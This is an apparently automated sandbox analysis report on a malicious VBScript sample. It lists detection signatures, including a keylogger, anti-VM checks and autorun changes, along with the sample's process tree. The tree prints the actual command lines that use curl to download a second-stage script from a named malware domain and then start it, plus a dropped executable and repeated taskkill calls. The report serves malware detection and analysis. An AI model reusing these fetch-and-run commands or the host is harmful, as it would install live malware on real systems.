Windows
Analysis Report
6724c67fe2634.vbs
Overview
General Information
Detection
Score | Range | Whitelisted | Confidence
---|---|---|---
100 | 0 - 100 | false | 100%
Signatures
Benign windows process drops PE files
Multi AV Scanner detection for dropped file
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Excessive usage of taskkill to terminate processes
Overwrites code with function prologues
Potential malicious VBS script found (has network functionality)
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Uses ipconfig to lookup or modify the Windows network settings
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Script Initiated Connection
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Keylogger Generic
Classification
- System is w10x64
- wscript.exe (PID: 6788 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\6724c67fe2634.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
- cmd.exe (PID: 4592 cmdline: "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\6724c67fe2636.vbs https://analisardocumento.com/6724c67fe2573/6724c67fe2636.vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 5068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- curl.exe (PID: 6656 cmdline: curl -k -o C:\Users\Public\6724c67fe2636.vbs https://analisardocumento.com/6724c67fe2573/6724c67fe2636.vbs MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
- cmd.exe (PID: 6396 cmdline: "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6724c67fe2636.vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 6548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- wscript.exe (PID: 5052 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Public\6724c67fe2636.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
- CSRPS.exe (PID: 6204 cmdline: "C:\_6724c67fe2573\CSRPS.exe" MD5: 74D3F521A38B23CD25ED61E4F8D99F16)
- cmd.exe (PID: 6776 cmdline: "C:\Windows\System32\cmd.exe" /C C:\_6724c67fe2573\MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 5276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- taskkill.exe (PID: 2616 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 7564 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 8076 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- cmd.exe (PID: 4676 cmdline: cmd.exe /c ipconfig /flushdns MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 7088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- ipconfig.exe (PID: 5260 cmdline: ipconfig /flushdns MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
- Conhost.exe (PID: 5612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 5176 cmdline: "C:\Windows\System32\cmd.exe" /C C:\_6724c67fe2573\MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- taskkill.exe (PID: 7612 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 8040 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- cmd.exe (PID: 6252 cmdline: "C:\Windows\System32\cmd.exe" /C C:\_6724c67fe2573\MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 6976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- taskkill.exe (PID: 5556 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 7820 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 4404 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- cmd.exe (PID: 6020 cmdline: "C:\Windows\System32\cmd.exe" /C C:\_6724c67fe2573\MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- taskkill.exe (PID: 7704 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 7288 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- cmd.exe (PID: 4180 cmdline: "C:\Windows\System32\cmd.exe" /C C:\_6724c67fe2573\MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 6780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- taskkill.exe (PID: 7736 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 8124 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- cmd.exe (PID: 320 cmdline: "C:\Windows\System32\cmd.exe" /C C:\_6724c67fe2573\MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 1440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- taskkill.exe (PID: 7532 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 7972 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- cmd.exe (PID: 1264 cmdline: "C:\Windows\System32\cmd.exe" /C C:\_6724c67fe2573\MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 5052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- taskkill.exe (PID: 7696 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 8132 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- cmd.exe (PID: 5136 cmdline: "C:\Windows\System32\cmd.exe" /C C:\_6724c67fe2573\MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 1096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- taskkill.exe (PID: 7544 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 7948 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 7084 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- cmd.exe (PID: 1292 cmdline: "C:\Windows\System32\cmd.exe" /C C:\_6724c67fe2573\MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 2508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- taskkill.exe (PID: 7680 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 8032 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- cmd.exe (PID: 7192 cmdline: "C:\Windows\System32\cmd.exe" /C C:\_6724c67fe2573\MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 7212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- taskkill.exe (PID: 7688 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 7964 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 4024 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- cmd.exe (PID: 7260 cmdline: "C:\Windows\System32\cmd.exe" /C C:\_6724c67fe2573\MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 7284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- taskkill.exe (PID: 7752 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 8156 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- cmd.exe (PID: 7364 cmdline: "C:\Windows\System32\cmd.exe" /C C:\_6724c67fe2573\MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 7384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- taskkill.exe (PID: 7624 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 8116 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- cmd.exe (PID: 7400 cmdline: "C:\Windows\System32\cmd.exe" /C C:\_6724c67fe2573\MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 7420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- taskkill.exe (PID: 7788 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 1628 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- cmd.exe (PID: 7432 cmdline: "C:\Windows\System32\cmd.exe" /C C:\_6724c67fe2573\MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 7440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- taskkill.exe (PID: 7796 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 8176 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- cmd.exe (PID: 6392 cmdline: "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6724c67fe2636.vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- wscript.exe (PID: 6648 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Public\6724c67fe2636.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
- cleanup
No configs have been found
Source | Rule | Description | Author | Strings
---|---|---|---|---
 | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security | 
 | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | 

Source | Rule | Description | Author | Strings
---|---|---|---|---
 | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security | 
System Summary |
---|
Source: | Author: frack113, Florian Roth: |
Source: | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): |
Source: | Author: frack113: |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Michael Haag: |
No Suricata rule has matched
AV Detection |
---|
Source: | ReversingLabs: |
Source: | Binary or memory string: | memstr_19707715-6 |
Source: | HTTPS traffic detected: |
Source: | Binary string: |
Source: | Code function: | 12_2_6F85C2D0 |
Software Vulnerabilities |
---|
Source: | Child: |
Networking |
---|
Source: | Network Connect: | Jump to behavior |
Source: | Dropped file: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | JA3 fingerprint: |
Source: | HTTP traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: |